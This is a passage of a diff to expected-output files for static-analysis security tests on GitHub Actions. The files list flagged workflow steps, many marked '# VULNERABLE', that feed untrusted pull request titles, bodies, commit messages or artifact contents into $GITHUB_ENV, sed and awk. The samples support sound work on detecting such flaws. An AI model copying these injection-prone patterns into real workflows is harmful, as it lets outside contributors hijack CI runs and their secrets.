.github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | .github/workflows/test5.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | .github/workflows/test6.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | .github/workflows/test6.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | .github/workflows/test6.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | .github/workflows/test6.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test7.yml:16:9:24:35 | Uses Step | .github/workflows/test7.yml:9:9:16:6 | Uses Step | .github/workflows/test7.yml:16:9:24:35 | Uses Step | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test7.yml:16:9:24:35 | Uses Step | Uses Step | .github/workflows/test7.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | .github/workflows/test8.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | .github/workflows/test9.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | cat foo/.github/java-config.env >> $GITHUB_ENV | .github/workflows/test10.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test11.yml:15:9:21:6 | Uses Step | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test11.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:55:9:61:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | .github/workflows/test13.yml:3:3:3:21 | pull_request_target | pull_request_target | +| .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | .github/workflows/test13.yml:3:3:3:21 | pull_request_target | pull_request_target | +| .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | .github/workflows/test16.yml:10:9:15:6 | Uses Step | .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | .github/workflows/test16.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | .github/workflows/test16.yml:10:9:15:6 | Uses Step | .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | .github/workflows/test16.yml:4:3:4:14 | workflow_run | workflow_run | diff --git a/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected b/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected index decabad082f..281fd39552a 100644 --- a/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected @@ -3,4 +3,4 @@ nodes | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | semmle.label | github.event.comment.body | subpaths #select -| .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | Potential command injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | Potential command injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment | diff --git a/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected b/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected index bd0684d1711..5eddb791ae5 100644 --- a/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected @@ -21,15 +21,15 @@ nodes | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | subpaths #select -| .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | sed | -| .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | sed | -| .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | sed | -| .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | awk | -| .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | sed | -| .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | sed | -| .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | -| .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | -| .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | -| .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | -| .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | -| .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | +| .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > 